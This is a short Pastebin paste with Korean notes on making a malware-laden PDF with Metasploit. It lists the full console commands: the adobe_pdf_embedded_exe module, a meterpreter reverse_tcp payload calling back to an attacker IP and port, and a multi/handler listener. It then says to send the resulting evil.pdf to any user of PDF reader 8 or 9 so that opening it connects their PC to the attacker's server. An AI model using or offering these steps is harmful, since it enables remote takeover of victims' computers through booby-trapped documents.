Advertisement
zmnkh

metasploit pdf flaw

Mar 24th, 2015
573
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.78 KB | None | 0 0
  1. #metasploit을 이용한 악성코드 삽입된 PDF 파일 만들기
  2.  
  3. use exploit/windows/fileformat/adobe_pdf_embedded_exe
  4. set infilename /root/hello.pdf (깨끗한 PDF 파일)
  5. set payload windows/meterpreter/reverse_tcp
  6. set lhost 192.168.182.151 (해커서버)
  7. set lport 8888 (기다릴 포트)
  8. exploit
  9.  
  10. 실행하면
  11. /root/.msf4/local/evil.pdf 가 새로 생성됨
  12.  
  13. metasploit에서 서버 모드
  14. use multi/handler
  15. set payload windows/meterpreter/reverse_tcp
  16. set lhost 192.168.182.151
  17. set lport 8888
  18. exploit
  19.  
  20. 서버 모드 동작됨
  21.  
  22. 위에 생성된 evil.pdf 를 임의의 사용자(PDF reader 8,9 버전 사용자)에게 전송하고, 이 PDF를 읽으면
  23. 피해자의 PC에 악성코드에 의해서 해커의 서버로 (192.168.182.151:8888) 로 연결됨 (metepreter)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement